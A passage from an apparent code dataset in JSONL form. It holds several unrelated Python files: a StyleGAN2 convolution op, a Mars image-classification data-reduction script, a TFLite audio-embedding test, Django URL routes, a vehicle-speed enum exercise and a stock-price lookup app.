up/downsampling.\n if up > 1:\n px0 += (fw + up - 1) // 2\n px1 += (fw - up) // 2\n py0 += (fh + up - 1) // 2\n py1 += (fh - up) // 2\n if down > 1:\n px0 += (fw - down + 1) // 2\n px1 += (fw - down) // 2\n py0 += (fh - down + 1) // 2\n py1 += (fh - down) // 2\n\n # Fast path: 1x1 convolution with downsampling only => downsample first, then convolve.\n if kw == 1 and kh == 1 and (down > 1 and up == 1):\n x = upfirdn2d.upfirdn2d(x=x, f=f, down=down, padding=[px0,px1,py0,py1], flip_filter=flip_filter)\n x = _conv2d_wrapper(x=x, w=w, groups=groups, flip_weight=flip_weight)\n return x\n\n # Fast path: 1x1 convolution with upsampling only => convolve first, then upsample.\n if kw == 1 and kh == 1 and (up > 1 and down == 1):\n x = _conv2d_wrapper(x=x, w=w, groups=groups, flip_weight=flip_weight)\n x = upfirdn2d.upfirdn2d(x=x, f=f, up=up, padding=[px0,px1,py0,py1], gain=up**2, flip_filter=flip_filter)\n return x\n\n # Fast path: downsampling only => use strided convolution.\n if down > 1 and up == 1:\n x = upfirdn2d.upfirdn2d(x=x, f=f, padding=[px0,px1,py0,py1], flip_filter=flip_filter)\n x = _conv2d_wrapper(x=x, w=w, stride=down, groups=groups, flip_weight=flip_weight)\n return x\n\n # Fast path: upsampling with optional downsampling => use transpose strided convolution.\n if up > 1:\n if groups == 1:\n w = w.transpose(0, 1)\n else:\n w = w.reshape(groups, out_channels // groups, in_channels_per_group, kh, kw)\n w = w.transpose(1, 2)\n w = w.reshape(groups * in_channels_per_group, out_channels // groups, kh, kw)\n px0 -= kw - 1\n px1 -= kw - up\n py0 -= kh - 1\n py1 -= kh - up\n pxt = max(min(-px0, -px1), 0)\n pyt = max(min(-py0, -py1), 0)\n x = _conv2d_wrapper(x=x, w=w, stride=up, padding=[pyt,pxt], groups=groups, transpose=True, flip_weight=(not flip_weight))\n x = upfirdn2d.upfirdn2d(x=x, f=f, padding=[px0+pxt,px1+pxt,py0+pyt,py1+pyt], gain=up**2, flip_filter=flip_filter)\n if down > 1:\n x = upfirdn2d.upfirdn2d(x=x, f=f, down=down, flip_filter=flip_filter)\n return x\n\n # Fast path: no up/downsampling, padding supported by the underlying implementation => use plain conv2d.\n if up == 1 and down == 1:\n if px0 == px1 and py0 == py1 and px0 >= 0 and py0 >= 0:\n return _conv2d_wrapper(x=x, w=w, padding=[py0,px0], groups=groups, flip_weight=flip_weight)\n\n # Fallback: Generic reference implementation.\n x = upfirdn2d.upfirdn2d(x=x, f=(f if up > 1 else None), up=up, padding=[px0,px1,py0,py1], gain=up**2, flip_filter=flip_filter)\n x = _conv2d_wrapper(x=x, w=w, groups=groups, flip_weight=flip_weight)\n if down > 1:\n x = upfirdn2d.upfirdn2d(x=x, f=f, down=down, flip_filter=flip_filter)\n return x\n\n#----------------------------------------------------------------------------\n","sub_path":"converters/stylegan2ada_pth_official/torch_utils/ops/conv2d_resample.py","file_name":"conv2d_resample.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"464772532","text":"#!/usr/bin/env python\nfrom __future__ import division, print_function\n\nimport argparse\nimport logging\nimport os\nimport sys\nimport time\n\nimport pandas as pd\nfrom IPython.parallel import Client\nfrom odo import odo\n\nfrom .helper_functions import define_season_column\nfrom .p4io import (data_root, get_current_database_fname,\n get_image_names_from_db)\n\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\n# the split trick creates lists when u don't want to break ur fingers with\n# typing ',,'','',',,' all the time...\nblotch_data_cols = 'x y image_x image_y radius_1 radius_2'.split()\nfan_data_cols = 'x y image_x image_y distance angle spread'.split()\n\nanalysis_cols = ['classification_id',\n 'created_at',\n 'image_id',\n 'image_name',\n 'image_url',\n 'user_name',\n 'marking',\n 'x_tile',\n 'y_tile',\n 'acquisition_date',\n 'local_mars_time',\n 'x',\n 'y',\n 'image_x',\n 'image_y',\n 'radius_1',\n 'radius_2',\n 'distance',\n 'angle',\n 'spread',\n 'version']\n\ndata_columns = ['classification_id', 'image_id',\n 'image_name', 'user_name', 'marking',\n 'acquisition_date', 'local_mars_time']\n\n\ndef scan_for_incomplete(df, marking):\n \"\"\"scan for incomplete data and remove from dataframe.\"\"\"\n # split data into this marking and NOT this marking.\n marked = df[df.marking == marking]\n rest = df[df.marking != marking]\n\n if marking == 'fan':\n data_cols = fan_data_cols\n elif marking == 'blotch':\n data_cols = blotch_data_cols\n else:\n print(\"Not supported marking\")\n return\n\n # create index file. basic idea is: from the above defined data cols for\n # a marking, none of them is allowed to be unfilled. (== isnull )\n ind = marked[data_cols].isnull().any(axis=1)\n # select for negated index, as we do NOT want incomplete data\n marked = marked[~ind]\n\n # merge previously splitted together and return\n return pd.concat([marked, rest])\n\n\ndef convert_times(df):\n logging.info(\"Starting time conversion now.\")\n df.acquisition_date = pd.to_datetime(df.acquisition_date)\n df.created_at = pd.to_datetime(df.created_at,\n format='%Y-%m-%d %H:%M:%S %Z')\n logging.info(\"Time conversions done.\")\n\n\ndef splitting_tutorials(rootpath, df):\n logging.info(\"Splitting off tutorials now.\")\n tutorials = df[df.image_name == 'tutorial']\n tutfpath = '{}_tutorials.h5'.format(rootpath)\n tutorials = tutorials.drop(['image_id',\n 'image_url',\n 'image_name',\n 'local_mars_time'], axis=1)\n tutorials.to_hdf(tutfpath, 'df')\n\n logging.info(\"Tutorial split done.\\nCreated {}.\".format(tutfpath))\n return df[df.image_name != 'tutorial']\n\n\ndef produce_fast_read(rootpath, df):\n logging.info(\"Now writing fixed format datafile for \"\n \"fast read-in of all data.\")\n newfpath = '{0}_fast_all_read.h5'.format(rootpath)\n df.to_hdf(newfpath, 'df')\n logging.info(\"Created {}.\".format(newfpath))\n\n\ndef convert_ellipse_angles(df):\n logging.info(\"Converting ellipse angles.\")\n\n def func(angle):\n if angle < 0:\n return angle + 180\n elif angle > 180:\n return angle - 180\n else:\n return angle\n df.loc[df.marking == 'blotch', 'angle'].map(func)\n logging.info(\"Conversion of ellipse angles done.\")\n\n\ndef calculate_hirise_pixels(df):\n logging.info(\"Calculating and assigning hirise pixel coordinates\")\n df = df.assign(hirise_x=lambda row: (row.x + 740 * (row.x_tile - 1)).round(),\n hirise_y=lambda row: (row.y + 548 * (row.y_tile - 1)).round())\n logging.info(\"Hirise pixels coords added.\")\n return df\n\n\ndef remove_duplicates_from_image_name_data(data):\n \"\"\"remove duplicates from this data.\n\n Parameters\n ==========\n data: pd.DataFrame\n already filtered for an image_id\n\n Returns\n =======\n For each `user_name` and `image_id` found in `data` return only the data\n for the first found classification_id. There *should* only be one\n classification_id per user_name and image_id, but sometimes the queue\n presented the same image_id more than once to the same users. This removes\n any later in time classification_ids per user_name and image_id.\n \"\"\"\n def process_user_group(g):\n c_id = g.sort('created_at').classification_id.iloc[0]\n return g[g.classification_id == c_id]\n return data.groupby(['image_id', 'user_name']).apply(\n process_user_group).reset_index(drop=True)\n\n\ndef get_temp_fname(image_name):\n import os\n return os.path.join(data_root, 'temp_' + image_name + '.h5')\n\n\ndef remove_duplicates(df):\n logging.info('Removing duplicates.')\n\n image_names = df.image_name.unique()\n\n def process_image_name(image_name):\n data = df[df.image_name == image_name]\n data = remove_duplicates_from_image_name_data(data)\n data.to_hdf(get_temp_fname(image_name), 'df')\n\n # parallel approach, u need to launch an ipcluster/controller for this work!\n c = Client()\n dview = c.direct_view()\n dview.push({'remove_duplicates_from_image_name_data':\n remove_duplicates_from_image_name_data,\n 'data_root': data_root})\n lbview = c.load_balanced_view()\n lbview.map_sync(process_image_name, image_names)\n\n df = []\n for image_name in image_names:\n try:\n df.append(pd.read_hdf(get_temp_fname(image_name), 'df'))\n except OSError:\n continue\n else:\n os.remove(get_temp_fname(image_name))\n df = pd.concat(df, ignore_index=True)\n logging.info('Duplicates removal complete.')\n return df\n\n\ndef get_image_names(dbname):\n logging.info('Reading image_names from disk.')\n store = pd.HDFStore(dbname)\n image_names = store.select_column('df', 'image_name').unique()\n logging.info('Got image_names')\n return image_names\n\n\ndef merge_temp_files(dbname, image_names=None, do_odo=False):\n if do_odo:\n logging.info('Merging temp files with odo.')\n else:\n logging.info('Merging temp files manually.')\n\n if image_names is None:\n image_names = get_image_names(dbname)\n\n dbname_base, ext = os.path.splitext(dbname)\n dbnamenew = dbname_base + '_cleaned' + ext\n logging.info('Creating concatenated db file {}'.format(dbnamenew))\n if not do_odo:\n df = []\n for image_name in image_names:\n try:\n if do_odo:\n odo('hdfstore://{}::df'.format(get_temp_fname(image_name)),\n 'hdfstore://{}::df'.format(dbnamenew))\n else:\n df.append(pd.read_hdf(get_temp_fname(image_name), 'df'))\n except OSError:\n continue\n else:\n os.remove(get_temp_fname(image_name))\n df = pd.concat(df, ignore_index=True)\n df.to_hdf(dbnamenew, 'df',\n format='table',\n data_columns=data_columns)\n logging.info('Duplicates removal complete.')\n return dbnamenew\n\n\ndef remove_duplicates_from_file(dbname, do_odo=False):\n logging.info('Removing duplicates.')\n\n image_names = get_image_names(dbname)\n\n def process_image_name(image_name):\n import pandas as pd\n data = pd.read_hdf(dbname, 'df', where='image_name==' + image_name)\n data = remove_duplicates_from_image_name_data(data)\n data.to_hdf(get_temp_fname(image_name), 'df')\n\n # parallel approach, u need to launch an ipcluster/controller for this work!\n c = Client()\n dview = c.direct_view()\n dview.push({'remove_duplicates_from_image_name_data':\n remove_duplicates_from_image_name_data,\n 'data_root': data_root,\n 'get_temp_fname': get_temp_fname})\n lbview = c.load_balanced_view()\n logging.info('Starting parallel processing.')\n lbview.map_sync(process_image_name, image_names)\n logging.info('Done clean up. Now concatenating results.')\n\n merge_temp_files(dbname, image_names, do_odo)\n\n\ndef create_season2_and_3_database():\n \"\"\"Define season columns and write out seaon 2 and 3 database results.\n\n Has to be executed after the main reduction has finished.\n Installed as main command line script under name create_season2and3.\n \"\"\"\n fname = get_current_database_fname()\n image_names = get_image_names_from_db(fname)\n metadf = pd.DataFrame(image_names[image_names != 'tutorial'],\n columns=['image_name'])\n logging.info('Found {} image_names'.format(len(metadf.image_name)))\n\n define_season_column(metadf)\n\n fname_base = os.path.basename(fname)\n root = os.path.dirname(fname)\n fname_no_ext = os.path.splitext(fname_base)[0]\n rootpath = os.path.join(root, fname_no_ext)\n newfname = '{}_seasons2and3.h5'.format(rootpath)\n if os.path.exists(newfname):\n os.remove(newfname)\n logging.info('Starting production of season 2 and 3 database.')\n all_images = metadf[(metadf.season > 1) & (metadf.season < 4)].image_name\n for i, image_name in enumerate(all_images):\n logging.info('Processing... {:.1f} %'\n .format(100 * (i + 1) / len(all_images)))\n try:\n df = pd.read_hdf(fname, 'df', where='image_name=' + image_name)\n df.to_hdf(newfname, 'df', mode='a', format='t', append=True,\n data_columns=data_columns,\n min_itemsize={'local_mars_time': 8})\n except ValueError as e:\n print(image_name, e)\n sys.exit(-1)\n logging.info('Finished. Produced {}.'.format(newfname))\n\n\ndef main():\n import imp\n try:\n imp.find_module('tables')\n except ImportError:\n print(\"Please install the PyTables module. It is required.\")\n sys.exit()\n parser = argparse.ArgumentParser()\n parser.add_argument('csv_fname',\n help=\"Provide the filename of the database \"\n \"dump csv-file here.\")\n parser.add_argument('--raw_times',\n help=\"Do not parse the times into a Python datetime\"\n \" object. For the stone-age. ;) Default:\"\n \" parse into datetime object.\",\n action='store_true')\n parser.add_argument('--keep_dirt',\n help=\"Do not filter for dirty data. Keep everything.\"\n \" Default: Do the filtering.\",\n action='store_true')\n parser.add_argument('--do_fastread',\n help='Produce the fast-read database file for'\n ' complete read into memory.',\n action='store_true')\n parser.add_argument('--remove_dups',\n help='Remove duplicates from database',\n action='store_true')\n parser.add_argument('--test_n_rows',\n help=\"Set this to do a test parse of n rows\",\n type=int, default=None)\n args = parser.parse_args()\n\n t0 = time.time()\n logging.info(\"Starting reduction.\")\n\n # creating file paths\n fname = os.path.abspath(args.csv_fname)\n fname_base = os.path.basename(fname)\n root = os.path.dirname(fname)\n fname_no_ext = os.path.splitext(fname_base)[0]\n rootpath = os.path.join(root, fname_no_ext)\n\n # as chunksize and nrows cannot be used together yet, i switch chunksize\n # to None if I want test_n_rows for a small test database:\n if args.test_n_rows is not None:\n chunks = None\n else:\n chunks = 1e6\n # creating reader object with pandas interface for csv parsing\n # doing this in chunks as its faster. Also, later will do a split\n # into multiple processes to do this.\n reader = pd.read_csv(fname, chunksize=chunks, na_values=['null'],\n usecols=analysis_cols, nrows=args.test_n_rows,\n engine='c')\n\n # read in data chunk by chunk and collect into python list\n data = [chunk for chunk in reader]\n logging.info(\"Data collected into list.\")\n\n # convert list into Pandas dataframe\n df = pd.concat(data, ignore_index=True)\n logging.info(\"Conversion to dataframe complete.\")\n\n # convert times to datetime object\n if not args.raw_times:\n convert_times(df)\n\n # split off tutorials\n df = splitting_tutorials(rootpath, df)\n\n logging.info('Scanning for and dropping empty lines now.')\n df = df.dropna(how='all')\n logging.info(\"Dropped empty lines.\")\n\n if not args.keep_dirt:\n logging.info(\"Now scanning for incomplete marking data.\")\n for marking in ['fan', 'blotch']:\n df = scan_for_incomplete(df, marking)\n logging.info(\"Done removing incompletes.\")\n\n convert_ellipse_angles(df)\n\n df = calculate_hirise_pixels(df)\n\n if args.do_fastread:\n produce_fast_read(rootpath, df)\n\n logging.info(\"Now writing query-able database file.\")\n newfpath = '{0}_queryable.h5'.format(rootpath)\n df.to_hdf(newfpath, 'df',\n format='table',\n data_columns=['image_name'])\n logging.info(\"Writing to HDF file finished. Created {}. \"\n \"Reduction complete.\".format(newfpath))\n\n if args.remove_dups:\n remove_duplicates_from_file(newfpath)\n\n dt = time.time() - t0\n logging.info(\"Time taken: {} minutes.\".format(dt / 60.0))\n\nif __name__ == '__main__':\n main()\n","sub_path":"planet4/reduction.py","file_name":"reduction.py","file_ext":"py","file_size_in_byte":13791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"233694502","text":"\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\nimport os\nimport random\nimport csv\nimport json\nimport glob\nimport numpy as np\nimport resampy\n#import tensorflow as tf\nimport tflite_runtime.interpreter as tflite\nimport soundfile as sf\nimport librosa\nimport time\nimport sys\n\ndef initialize_uninitialized_variables(sess):\n if hasattr(tf, 'global_variables'):\n variables = tf.global_variables()\n else:\n variables = tf.all_variables()\n\n uninitialized_variables = []\n for v in variables:\n if not hasattr(v, '_keras_initialized') or not v._keras_initialized:\n uninitialized_variables.append(v)\n v._keras_initialized = True\n\n if uninitialized_variables:\n if hasattr(tf, 'variables_initializer'):\n sess.run(tf.variables_initializer(uninitialized_variables))\n else:\n sess.run(tf.initialize_variables(uninitialized_variables)) \n \ndef get_l3model(model_path, saved_model_type='tflite'):\n l3embedding_model = tflite.Interpreter(model_path=model_path) \n return l3embedding_model\n\ndef get_output_path(filepath, suffix, output_dir=None):\n \"\"\"\n Parameters\n ----------\n filepath : str\n Path to audio file to be processed\n suffix : str\n String to append to filename (including extension)\n output_dir : str or None\n Path to directory where file will be saved. If None, will use directory of given filepath.\n Returns\n -------\n output_path : str\n Path to output file\n \"\"\"\n base_filename = os.path.splitext(os.path.basename(filepath))[0]\n if not output_dir:\n output_dir = os.path.dirname(filepath)\n\n if suffix[0] != '.':\n output_filename = \"{}_{}\".format(base_filename, suffix)\n else:\n output_filename = base_filename + suffix\n\n return os.path.join(output_dir, output_filename)\n\ndef _center_audio(audio, frame_len):\n \"\"\"Center audio so that first sample will occur in the middle of the first frame\"\"\"\n return np.pad(audio, (int(frame_len / 2.0), 0), mode='constant', constant_values=0)\n\n\ndef _pad_audio(audio, frame_len, hop_len):\n \"\"\"Pad audio if necessary so that all samples are processed\"\"\"\n audio_len = audio.size\n if audio_len < frame_len:\n pad_length = frame_len - audio_len\n else:\n pad_length = int(np.ceil((audio_len - frame_len)/float(hop_len))) * hop_len \\\n - (audio_len - frame_len)\n\n if pad_length > 0:\n audio = np.pad(audio, (0, pad_length), mode='constant', constant_values=0)\n\n return audio\n\ndef _amplitude_to_db(S, amin=1e-10, dynamic_range=80.0):\n magnitude = np.abs(S)\n power = np.square(magnitude, out=magnitude)\n ref_value = power.max()\n\n log_spec = 10.0 * np.log10(np.maximum(amin, magnitude))\n log_spec -= log_spec.max()\n\n log_spec = np.maximum(log_spec, -dynamic_range)\n return log_spec\n\ndef get_embedding(audio, sr, model=None, hop_size=0.1, center=True,\\\n n_fft=None, n_mels=None, mel_hop_len=None, fmax=None):\n \"\"\"\n Computes and returns L3 embedding for given audio data\n \"\"\"\n interpreter = model\n \n if audio.size == 0:\n raise ValueError('Got empty audio')\n\n # Resample if necessary\n if sr != TARGET_SR:\n audio = resampy.resample(audio, sr_orig=sr, sr_new=TARGET_SR, filter='kaiser_best')\n\n audio_len = audio.size\n frame_len = TARGET_SR\n hop_len = int(hop_size * TARGET_SR)\n\n if audio_len < frame_len:\n warnings.warn('Duration of provided audio is shorter than window size (1 second). Audio will be padded.',\n L3Warning)\n\n if center:\n # Center audio\n audio = _center_audio(audio, frame_len)\n\n # Pad if necessary to ensure that we process all samples\n audio = _pad_audio(audio, frame_len, hop_len)\n\n # Split audio into frames, copied from librosa.util.frame\n frames = librosa.util.utils.frame(audio, frame_length=frame_len, hop_length=hop_len).T\n X = []\n for frame in frames:\n S = np.abs(librosa.core.stft(frame, n_fft=n_fft, hop_length=mel_hop_len,\\\n window='hann', center=True, pad_mode='constant'))\n S = librosa.feature.melspectrogram(sr=sr, S=S, n_mels=n_mels, fmax=fmax,\n power=1.0, htk=True)\n S = _amplitude_to_db(np.array(S))\n X.append(S)\n\n #X = np.array(X)[:, :, :, np.newaxis].astype(np.float32)\n\n # Get the L3 embedding for each frame\n batch_size = len(X)\n\n interpreter.allocate_tensors()\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n\n input_shape = input_details[0]['shape'][1:]\n output_shape = output_details[0]['shape'][1:]\n input_index = input_details[0]['index']\n output_index = output_details[0]['index']\n embedding_length = output_shape[-1]\n \n #interpreter.resize_tensor_input(input_index, ((batch_size, ) + tuple(input_shape)))\n #interpreter.resize_tensor_input(output_index, ((batch_size, ) + tuple(output_shape)))\n \n # print(\"== Input details ==\")\n # print(interpreter.get_input_details()[0])\n # print(\"type:\", input_details[0]['dtype'])\n # print(\"\\n== Output details ==\")\n # print(interpreter.get_output_details()[0])\n \n predictions = np.zeros((batch_size, embedding_length), dtype=np.float32)\n\n\n for idx in range(len(X)):\n #predictions per batch\n #print(np.array(X[idx]).shape)\n x = np.array(X[idx])[np.newaxis, :, :, np.newaxis].astype(np.float32)\n interpreter.set_tensor(input_index, x)\n interpreter.invoke()\n #print('Interpreter Invoked!')\n output = interpreter.get_tensor(output_index)\n predictions[idx] = np.reshape(output, (output.shape[0], output.shape[-1]))\n return predictions\n\ndef process_file(filepath, output_dir=None, model=None, hop_size=0.1,\\\n n_fft=None, n_mels=None, mel_hop_len=None, fmax=None):\n \"\"\"\n Computes and saves L3 embedding for given audio file\n \"\"\"\n if not os.path.exists(filepath):\n raise ValueError('File \"{}\" could not be found.'.format(filepath))\n\n try:\n audio, sr = sf.read(filepath)\n except Exception:\n raise ValueError('Could not open file \"{}\":\\n{}'.format(filepath, traceback.format_exc()))\n\n output_path = get_output_path(filepath, \".npz\", output_dir=output_dir)\n\n embedding = get_embedding(audio, sr, model=model, hop_size=hop_size,\\\n n_fft=n_fft, n_mels=n_mels, mel_hop_len=mel_hop_len, fmax=fmax)\n\n np.savez(output_path, embedding=embedding)\n assert os.path.exists(output_path)\n \nif __name__=='__main__':\n TEST_DIR = os.path.dirname(os.path.realpath('__file__')) #os.path.dirname(__file__)\n TEST_AUDIO_DIR = os.path.join(TEST_DIR, 'data')\n TFLITE_MODELS_DIR = os.path.join(TEST_DIR, 'tflite_models')\n OUTPUT_DIR = os.path.join(TEST_DIR, 'output')\n model_name = sys.argv[1]\n model_path = os.path.join(TFLITE_MODELS_DIR, model_name)\n CHIRP_1S_PATH = os.path.join(TEST_AUDIO_DIR, sys.argv[2])\n CHIRP_44K_PATH = os.path.join(TEST_AUDIO_DIR, 'chirp_44k.wav')\n\n if not os.path.isdir(OUTPUT_DIR):\n os.makedirs(OUTPUT_DIR)\n \n TARGET_SR = int(sys.argv[3])\n #n_mels = 64\n n_mels = int(sys.argv[4])\n hop_size = 0.1 \n #mel_hop_len = 160\n mel_hop_len = int(sys.argv[5])\n n_fft = 2048 \n fmax=None\n \n saved_model_type = 'tflite' \n l3embedding_model = get_l3model(model_path, saved_model_type=saved_model_type)\n for x in range(10):\n st = time.time()\n process_file(CHIRP_1S_PATH, output_dir=OUTPUT_DIR, model=l3embedding_model, hop_size=hop_size,\\\n n_mels=n_mels, n_fft=n_fft, mel_hop_len=mel_hop_len, fmax=fmax)\n print('Inference run %i: %0.3f' % (x + 1, time.time() - st))\n","sub_path":"test_emb_gen_tflite.py","file_name":"test_emb_gen_tflite.py","file_ext":"py","file_size_in_byte":7881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"370644837","text":"import django.views.defaults\nfrom django.conf.urls import include, url\nfrom django.contrib.auth.views import login as django_login\nfrom django.contrib.auth.views import logout as django_logout\n\nurlpatterns = [\n url(r'^$', 'website.views.index', name=\"index\"),\n url(r'^myfiles$', 'website.views.myfiles', name=\"myfiles\"),\n url(r'^cockpit$', 'website.views.cockpit', name=\"cockpit\"),\n url(r'^upload', 'website.views.upload', name=\"upload\"),\n url(r'^about', 'website.views.about', name=\"about\"),\n\n # Ajax views\n url(r'^generate_registration_key$', 'website.views.generate_registration_key', name=\"generate_registration_key\"),\n url(r'^mark_key_distributed$', 'website.views.mark_key_distributed', name=\"mark_key_distributed\"),\n url(r'^revoke_key$', 'website.views.revoke_key', name=\"revoke_key\"),\n url(r'^size_available$', 'website.views.size_available', name=\"size_available\"),\n\n # Authentication views\n url(r'^register$', 'website.views.register', name=\"register\"),\n url(r'^login$', django_login, name=\"login\"),\n url(r'^logout$', django_logout, {'template_name': \"registration/logout.html\"}, name=\"logout\"),\n\n # File downloading view\n url(r'^dl/(?P[-A-Za-z0-9_]+)$', 'website.views.download', name=\"download\"),\n url(r'^get/(?P[-A-Za-z0-9_]+)$', 'website.views.get', name=\"get\"),\n # File deleting view\n url(r'^rm/(?P[-A-Za-z0-9_]+)$', 'website.views.delete', name=\"delete\"),\n # File updating view\n url(r'^update/(?P[-A-Za-z0-9_]+)$', 'website.views.update', name=\"update\"),\n # Get file name\n url(r'^get_name/(?P[-A-Za-z0-9_]+)$', 'website.views.get_name', name=\"get_name\"),\n\n # 404 page\n url(r'^404$', 'django.views.defaults.page_not_found')\n]\n","sub_path":"fshare/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"619249698","text":"# pat\n\nfrom enum import Enum\n\n\n\nclass Vehicle(Enum):\n THRUSTSSC = (\"1227.985 km\", \"1 hr\")\n VESCO_TURBINATOR_II = (\"745.187 km\", \"1 hr\")\n ACT_ATTACK = (\"605.698 km\", \"1 hr\")\n JCB_DIESELMAX = (\"563.998 km\", \"1.5 hr\")\n VENTURI_VBB_3_STREAMLINER = (\"550.627 km\", \"2.2 hr\")\n BLACK_KNIGHT = (\"338.14 km\", \"1.2 hr\")\n RC_BULLET = (\"325.12 km\", \"2.2 hr\")\n INSPIRATION = (\"238.679 km\", \"1 hr\")\n ECOTRICITY_GREENBIRD = (\"203.09 km\", \"2.1 hr\")\n AEROVELO_ETA = (\"144.17 km\", \"1 hr\")\n SKY_ACE_TIGA = (\"91.332 km\", \"1 hr\")\n TRACKED_VEHICLE = (\"338.14 km\", \"2.2 hr\")\n\n\n\n def __init__(self, distance, time):\n self.distance = distance\n self.time = time\n\n\n def get_speed(self):\n self.speed = float(self.distance.split(' ')[0]) / float(self.time.split(' ')[0])\n return self.speed\n\n\n def convert_speed(self):\n self.mph = self.speed * 0.621371\n return self.mph\n\n\n\nprint(Vehicle.ACT_ATTACK.value[0])\nprint(Vehicle.RC_BULLET.value[1])\nprint(Vehicle.AEROVELO_ETA.get_speed(), 'km')\nprint(Vehicle.AEROVELO_ETA.convert_speed(), \"mph\")","sub_path":"Modules/enum_module/dev_exercise/vehicles4.py","file_name":"vehicles4.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"343604520","text":"# PBN TOOL BY SPAZZLO\n# TO BE USED WITH TASTOYS' PAINT BY NUMBERS\n# NOW WITH DONGLES\n\nimport sys\n\nif len(sys.argv) == 1:\n print(\"Gimmie a command file!\")\n sys.exit()\n\nimport pyperclip, time\n\nprint(\"Please select the chat box.\")\ntime.sleep(2)\n\ncommandsFile = open(sys.argv[1], \"r\")\ncommands = commandsFile.readlines()\ncommandsFile.close()\ncommandLength = len(commands)\nx = 0\n\nfor i in commands:\n x += 1\n pyperclip.copy(i)\n print(\"Copying [%s/%s] %s\" % (x, commandLength, i))\n time.sleep(3)\n","sub_path":"printImage.py","file_name":"printImage.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"605090709","text":"# my-secure-project/my_script.py\ndef main():\n\n import re\n import json\n from dotenv import load_dotenv\n import os\n import csv\n import requests\n\n import datetime\n import matplotlib\n import matplotlib.pyplot as plt\n import matplotlib.ticker as ticker\n\n from sendgrid import SendGridAPIClient\n from sendgrid.helpers.mail import Mail\n from sendgrid.helpers.mail import Mail, From, To, Subject, PlainTextContent, HtmlContent, SendGridException\n\n now = datetime.datetime.now()\n # print(os.getenv(\"ALPHAVANTAGE_API_KEY\")) # > None\n\n load_dotenv() # > loads contents of the .env file into the script's environment\n\n api_key = os.environ.get(\"ALPHAVANTAGE_API_KEY\")\n SENDGRID_API_KEY = os.getenv(\"SENDGRID_API_KEY\")\n MY_ADDRESS = os.environ.get(\"MY_EMAIL_ADDRESS\")\n\n # > \n client = SendGridAPIClient(SENDGRID_API_KEY)\n\n # print(api_key)\n\n # REFERENCED https://github.com/prof-rossetti/intro-to-python/blob/master/exercises/api-client/solution.py\n\n def getting_url(symbol_input):\n symbol_input = selected_stock\n request_url = f\"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol={symbol_input}&apikey={api_key}\"\n return request_url\n\n # followed Guided Screen Cast\n\n def process_ticker(symbol):\n request_url = getting_url(symbol) # requesting\n response = requests.get(request_url)\n # parse use the json module called jason.loads to change response.text to dictionary\n parsed_response = json.loads(response.text) # class to dict\n return parsed_response # define parsed response\n\n def transform_response(parsed_response):\n time_series = parsed_response[\"Time Series (Daily)\"]\n rows = [] # professor reosetti's robo example demo\n for date, daily_prices in time_series.items():\n row = {\n \"timestamp\": date,\n \"open\": float(daily_prices[\"1. open\"]),\n \"high\": float(daily_prices[\"2. high\"]),\n \"low\": float(daily_prices[\"3. low\"]),\n \"close\": float(daily_prices[\"4. close\"]),\n \"volume\": int(daily_prices[\"5. volume\"])\n }\n rows.append(row)\n return rows\n\n def write_to_csv(rows, csv_file_Path):\n csv_headers = [\"timestamp\", \"open\", \"high\", \"low\", \"close\", \"volume\"]\n with open(csv_file_path, \"w\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=csv_headers)\n writer.writeheader() # uses fieldnames set above\n for row in rows:\n writer.writerow(row)\n\n return True\n\n # csv_file_path = \"data/prices.csv\" # a relative filepath\n\n # timestamp, open, high, low, close, volume\n\n def usd_price(last_closing_price):\n return f\"${last_closing_price:,.2f}\" # usd conversion\n\n # USER INPUT\n\n if __name__ == \"__main__\": # revisited rock-paper and input module\n while True:\n selected_stock = input(\n \"Please enter the company symbol to access information: \")\n # fixed to acccept both lower and upper level alhabetical values, length of 4 or less.\n if len(selected_stock) > 4 or not re.match(\"^[A-Za-z]*$\", selected_stock):\n print(\"Invalid ticker, please Re-enter:\")\n else:\n if selected_stock == process_ticker(selected_stock):\n process_ticker(selected_stock)\n\n elif \"KeyError\" in process_ticker(selected_stock):\n print(\"Stock could not be found, please enter a valid ticker!\")\n # tried to replicate error checking from hiepnguneyen and megc on Github but is not working\n else:\n break\n\n # try:\n # data = process_ticker(selected_stock)\n # except KeyError:\n # print(\"Stock could not be found, please enter a valid ticker!\")\n # # KEYerror code still not working!\n # else:\n # break\n\n # followed Professor Rosetti's guided video\n parsed_response = process_ticker(selected_stock)\n last_refreshed = parsed_response[\"Meta Data\"][\"3. Last Refreshed\"]\n rows = transform_response(parsed_response) # define for write.csv\n row = transform_response(parsed_response) # define for plottin\n # matching the name from above def transform_response\n time_series = parsed_response[\"Time Series (Daily)\"]\n\n dates = list(time_series.keys())\n\n # taking the \"0\" from dates list \"2020-06-05 14:50:00\" //is latest date first?? MAKE SURE\n latest = dates[0]\n\n last_closing_price = time_series[latest][\"4. close\"]\n\n # breakpoint()\n\n recent_highs = [] # creating a list of highs to find the highest\n recent_lows = []\n\n for date in dates:\n recent_high = time_series[date][\"2. high\"]\n recent_highs.append(float(recent_high))\n recent_low = time_series[date][\"3. low\"]\n recent_lows.append(float(recent_low))\n\n recent_highest = max(recent_highs) # creating a list and\n recent_lowest = min(recent_lows)\n\n csv_file_path = os.path.join(os.path.dirname(\n __file__), \"..\", \"data\", \"prices.csv\") # ESTABLISHING CSV FILEPATH\n\n write_to_csv(rows, csv_file_path)\n\n formatted_csv_filepath = csv_file_path.split(\n \"..\")[1] # adopted from Prof Rosetti\n\n print(\"*****************************************************\")\n # referenced geeksforgeeks upper-lower input applications\n print(\"SELECTED SYMBOL:\" + 